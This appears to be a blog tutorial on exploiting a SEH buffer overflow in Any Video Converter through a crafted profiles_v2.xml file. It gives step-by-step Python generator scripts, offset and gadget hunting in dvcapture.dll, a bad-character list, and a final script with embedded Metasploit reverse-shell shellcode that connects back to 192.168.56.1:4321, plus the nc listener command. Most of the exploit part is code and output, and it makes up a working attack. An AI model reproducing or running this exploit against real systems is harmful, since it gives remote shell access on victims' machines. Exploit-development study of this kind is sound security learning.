#!/usr/bin/python
namafile="profiles_v2.xml"
junk="\x41"*500
buff="<root>\n"
buff=buff + "<categories>\n"
buff=buff + "<category name=\""+junk+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
buff=buff + "</categories>\n"
buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"
file=open(namafile,"w")
file.write(buff)
print("testing...")
file.close()
the fuzzer try to send 500 byte character A into Any Video Converter. we can see the application crash but the EIP not overwrite. and see the SEH chain
then press shift + f9 . so the EIP will be overwrite
- search the offset to overwrite the address of SEH
create the pattern for 500 bytes and then copy into fuzzer.
#!/usr/bin/python
namafile="profiles_v2.xml"
junk="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
buff="<root>\n"
buff=buff + "<categories>\n"
buff=buff + "<category name=\""+junk+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
buff=buff + "</categories>\n"
buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"
file=open(namafile,"w")
file.write(buff)
print("testing...")
file.close()
run the fuzzer again and see the SEH chain then press shift + F9. so we can got the pattern
then, use pattern offset
we know that we need 332 byte buffer to trigger the SEH handler.
- search the stepping stone
menu view --> executables modules.
search module to use as stepping stone that not compiled using safeSEH and DllCharacteristics.
to know the module are compiled by safeSEH and DllCharacteristics, use msfpescan
first i try to use module avcres.dll. and detoured.dll. the both module not compiled using safeSEH and DllCharacteristics. but i can't found the sequence command for POP POP RETN. So i try to use module dvcapture.dll
next step, serach the command POP, POP, RETN inside this module. double click on file dvcapture.dll, then right click --> search for --> sequence of commands and then type POP r32, POP r32, RETN
so we have found the memory address dvcapture.dll at offset 100013B4 but we have a problem because the address contain value \x00, \x0a and \x0d.
so we have to search the POP POP RETN doesn't contain value \x00, \x0a, and \x0d
- try to control the EIP
#!/usr/bin/python
namafile="profiles_v2.xml"
junk="\x90" * 328
coba="\xCC\xCC\xCC\xCC"
coba+="\xDD\xCC\xBB\xAA"
buff="<root>\n"
buff=buff + "<categories>\n"
buff=buff + "<category name=\""+junk+coba+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
buff=buff + "</categories>\n"
buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"
file=open(namafile,"w")
file.write(buff)
print("testing...")
file.close()
we can see that the value of our buffer success enter into SEH handler
- next step, try to control the CPU process
use the address of dvcapture.dll
#!/usr/bin/python
namafile="profiles_v2.xml"
junk="\x90" * 328
coba="\xCC\xCC\xCC\xCC"
coba+="\x33\xE6\x01\x10" #address of module dvcapture.dll
buff="<root>\n"
buff=buff + "<categories>\n"
buff=buff + "<category name=\""+junk+coba+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
buff=buff + "</categories>\n"
buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"
file=open(namafile,"w")
file.write(buff)
print("testing...")
file.close()
we can see that address of dvcapture.dll have been entered into SEH handler
- make the payload
here we got 6 bad character (0x00, 0x0a, 0x0d, 0x22, 0x26, 0x3e). if you want to know how to got the bad character, please visit here
and here, i try to use payload reverse bind shell
then, generate it
copy the payload into our fuzzer
#!/usr/bin/python
namafile="profiles_v2.xml"
junk="\x90" * 328
coba="\xeb\x06\x90\x90" #jmp short
coba+="\x33\xE6\x01\x10" #address of module .dll
coba+="\x90"*16
#/* win32_reverse - EXITFUNC=process LHOST=192.168.56.1 LPORT=4321 Size=314 Encoder=ShikataGaNai http://metasploit.com */
payload=("\xda\xd4\x31\xc9\xb8\x2f\x87\x18\x1f\xd9\x74\x24\xf4\xb1\x51\x5e"
"\x31\x46\x17\x83\xc6\x04\x03\x69\x94\xfa\xea\x89\xf0\x11\x59\x99"
"\xfc\x19\x9d\xa6\x9f\x6e\x0e\x7c\x44\xfa\x8a\x40\x0f\x80\x11\xc0"
"\x0e\x96\x91\x7f\x09\xe3\xf9\x5f\x28\x18\x4c\x14\x1e\x55\x4e\xc4"
"\x6e\xa9\xc8\xb4\x15\xe9\x9f\xc3\xd4\x20\x52\xca\x14\x5f\x99\xf7"
"\xcc\x84\x4a\x72\x08\x4f\xd5\x58\xd3\xbb\x8c\x2b\xdf\x70\xda\x74"
"\xfc\x87\x37\x89\xd0\x0c\x4e\xe1\x0c\x0f\x30\x3a\x7d\xf4\xd6\x37"
"\x3d\x3a\x9c\x07\xce\xb1\xd2\x9b\x63\x4e\x52\xab\x25\x39\xdd\xe5"
"\xd7\x55\xb1\x06\x31\xc3\x61\x9e\xd6\x3f\xb4\x36\x50\x33\x8a\x99"
"\xca\x4c\x3a\x4d\x38\x5f\x47\xb6\xee\x5f\x6e\x97\x87\x45\xe9\xa6"
"\x75\x8d\xf4\xfd\xef\x8c\x07\x2d\x87\x49\xfe\x38\xf5\x3d\xfe\x14"
"\x55\x91\x53\xcb\x09\x56\x07\xa8\xfe\xa7\x77\x48\x69\x49\x24\xf2"
"\x3a\xe0\x35\x6f\xd4\x56\xaf\xff\xe2\xc0\x2f\x29\x86\xfe\x9e\x80"
"\xa8\x2f\x48\x8e\xfa\xfe\x60\x99\xfb\x29\x21\x70\xfb\x06\xae\x9f"
"\x4a\x21\x66\x08\xb2\xfb\x29\xe2\x18\x51\x35\xda\x32\x31\x2e\xa3"
"\xf2\xbb\xe7\xac\x2d\x6e\xf7\x82\xb4\xfb\x63\x44\x51\x9f\x06\x01"
"\x44\x35\x89\x48\xae\x06\xa0\x8d\xda\xd2\x3a\xb3\x2a\x1b\xcf\x99"
"\xb3\xd9\x1d\x23\x09\xf2\xce\x56\xf4\x32\x5a\xc3\xa2\x2b\xee\xed"
"\x06\xbd\xf1\x64\x2d\x3d\xdb\xdd\xfa\x93\xb5\xb0\x55\x7e\x37\x63"
"\x07\x2b\x66\x7c\x77\xbb\x25\x5b\x7d\xf2\x65\xa4\xa8\x60\x75\xa5"
"\x62\x8a\x59\xd2\xda\x88\xd9\x20\x80\x8f\x08\xfa\xb6\xa0\xdd\x84"
"\x90\xa3\x6d\x2b\xde\xf2\x6d\x1b")
buff="<root>\n"
buff=buff + "<categories>\n"
buff=buff + "<category name=\""+junk+coba+payload+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
buff=buff + "</categories>\n"
buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"
file=open(namafile,"w")
file.write(buff)
print("testing...")
file.close()
the run the fuzzer and type this
root@bt:~/anyvideoconverter# nc -lvp 4321
it will listening on port 4321
and then run the application. so automaticlly, we will directly enter into shell windows.
Alhamdulillah ... :D
No comments:
Post a Comment